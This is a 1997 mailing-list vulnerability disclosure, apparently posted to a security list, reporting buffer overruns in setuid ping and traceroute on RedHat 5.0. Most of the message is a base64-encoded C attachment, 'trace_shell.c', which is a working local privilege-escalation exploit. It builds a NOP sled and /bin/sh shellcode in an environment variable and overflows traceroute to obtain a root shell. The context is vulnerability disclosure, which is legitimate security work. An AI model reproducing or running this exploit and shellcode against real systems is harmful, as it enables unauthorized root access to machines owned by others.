uffer Overrun in RedHat 5.0

Wilton Wong - ListMail (listmail@NOVA.BLACKSTAR.NET)
Sat, 13 Dec 1997 13:19:04 -0700

This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.

--Boundary_(ID_i60ZhFnS96LrhG6+QSRFig)
Content-type: TEXT/PLAIN; charset=US-ASCII

Just going though some setuid things and noticed that in RedHat 5.0 you
can overrun the buffers in /bin/ping and /usr/sbin/traceroute, I attached
an exploit for traceroute nothing fancy just what I had to test it with
simple eggshell.

Sorry if this has been mentioned before..

-- Wilton

-------------------------------------------------------------------------
Wilton Wong BlackStar Communications
URL: http://www.blackstar.net 16121 - 57 Street
Email: wwong@blackstar.net Edmonton AB T5Y 2T1
Tel: (403) 486-7783 Fax: (403) 484-6004
-------------------------------------------------------------------------

--Boundary_(ID_i60ZhFnS96LrhG6+QSRFig)
Content-id: <Pine.LNX.3.96.971213131903.16755C@nova.blackstar.net>
Content-type: TEXT/PLAIN; name=trace_shell.c; charset=US-ASCII
Content-description: exploit
Content-disposition: ATTACHMENT; FILENAME=trace_shell.c
Content-transfer-encoding: BASE64

LyoNCg0KICAgSnVzdCBZb3VyIFN0YW5kYXJkIEVHR1NIRUxMIFByb2dnaWU6
DQogICB0cmFjZXJvdXRlIGJ1ZmZlciBvdmVyZmxvdyBleHBsb2l0IGZvciBS
ZWRIYXQgTGludXggNS4wDQogICBtb3N0bHkgcmlwcGVkIGZyb20gQWxlcGgg
T25lIDxhbGVwaDFAdW5kZXJncm91bmQub3JnPg0KDQogICBXaWx0b24gV29u
Zw0KICAgd3dvbmdAYmxhY2tzdGFyLm5ldA0KDQogICBnY2MgLW8gdHJhY2Vf
c2hlbGwgdHJhY2Vfc2hlbGwuYw0KDQoqLw0KI2luY2x1ZGUgPHN0ZGxpYi5o
Pg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VUICAgICAgICAgICAgICAgICAw
DQojZGVmaW5lIERFRkFVTFRfQlVGRkVSX1NJWkUgICAgICAgICAgICAxMDE5
DQojZGVmaW5lIERFRkFVTFRfRUdHX1NJWkUgICAgICAgICAgICAgICAyMDQ4
DQojZGVmaW5lIE5PUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDkw
DQoNCmNoYXIgc2hlbGxjb2RlW10gPQ0KICAgICAgICAiXHhlYlx4MWZceDVl
XHg4OVx4NzZceDA4XHgzMVx4YzBceDg4XHg0Nlx4MDdceDg5XHg0Nlx4MGNc
eGIwXHgwYiINCiAgICAgICAgIlx4ODlceGYzXHg4ZFx4NGVceDA4XHg4ZFx4
NTZceDBjXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0MFx4Y2QiDQogICAg
ICAgICJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KdW5z
aWduZWQgbG9uZyBnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAl
ZXNwLCVlYXgiKTsNCn0NCg0Kdm9pZCBtYWluKGludCBhcmdjLCBjaGFyICph
cmd2W10pIHsNCiAgY2hhciAqYnVmZiwgKnB0ciwgKmVnZzsNCiAgbG9uZyAq
YWRkcl9wdHIsIGFkZHI7DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQs
IGJzaXplPURFRkFVTFRfQlVGRkVSX1NJWkU7DQogIGludCBpLCBlZ2dzaXpl
PURFRkFVTFRfRUdHX1NJWkU7DQoNCiAgaWYgKGFyZ2MgPiAxKSBic2l6ZSAg
PSBhdG9pKGFyZ3ZbMV0pOw0KICBpZiAoYXJnYyA+IDIpIG9mZnNldCA9IGF0
b2koYXJndlsyXSk7DQogIGlmIChhcmdjID4gMykgZWdnc2l6ZSA9IGF0b2ko
YXJndlszXSk7DQoNCiAgaWYgKCEoYnVmZiA9IG1hbGxvYyhic2l6ZSkpKSB7
DQogICAgcHJpbnRmKCJDYW4ndCBhbGxvY2F0ZSBtZW1vcnkuXG4iKTsNCiAg
ICBleGl0KDApOw0KICB9DQogIGlmICghKGVnZyA9IG1hbGxvYyhlZ2dzaXpl
KSkpIHsNCiAgICBwcmludGYoIkNhbid0IGFsbG9jYXRlIG1lbW9yeS5cbiIp
Ow0KICAgIGV4aXQoMCk7DQogIH0NCg0KICBhZGRyID0gZ2V0X3NwKCkgLSBv
ZmZzZXQ7DQogIHByaW50ZigiVXNpbmcgYWRkcmVzczogMHgleFxuIiwgYWRk
cik7DQogDQogIHB0ciA9IGJ1ZmY7DQogIGFkZHJfcHRyID0gKGxvbmcgKikg
cHRyOw0KICBmb3IgKGkgPSAwOyBpIDwgYnNpemU7IGkrPTQpDQogICAgKihh
ZGRyX3B0cisrKSA9IGFkZHI7DQoNCiAgcHRyID0gZWdnOw0KICBmb3IgKGkg
PSAwOyBpIDwgZWdnc2l6ZSAtIHN0cmxlbihzaGVsbGNvZGUpIC0gMTsgaSsr
KQ0KICAgICoocHRyKyspID0gTk9QOw0KDQogIGZvciAoaSA9IDA7IGkgPCBz
dHJsZW4oc2hlbGxjb2RlKTsgaSsrKQ0KICAgICoocHRyKyspID0gc2hlbGxj
b2RlW2ldOw0KDQogIGJ1ZmZbYnNpemUgLSAxXSA9ICdcMCc7DQogIGVnZ1tl
Z2dzaXplIC0gMV0gPSAnXDAnOw0KDQogIG1lbWNweShlZ2csIkVHRz0iLDQp
Ow0KICBwdXRlbnYoZWdnKTsNCiAgbWVtY3B5KGJ1ZmYsIlJFVD0iLDQpOw0K
ICBwdXRlbnYoYnVmZik7DQogIHByaW50ZigiTm93IHJ1bjogL3Vzci9zYmlu
L3RyYWNlcm91dGUgJFJFVFxuIik7DQogIHN5c3RlbSgiL2Jpbi9iYXNoIik7
DQp9DQogIA0KDQo=

--Boundary_(ID_i60ZhFnS96LrhG6+QSRFig)--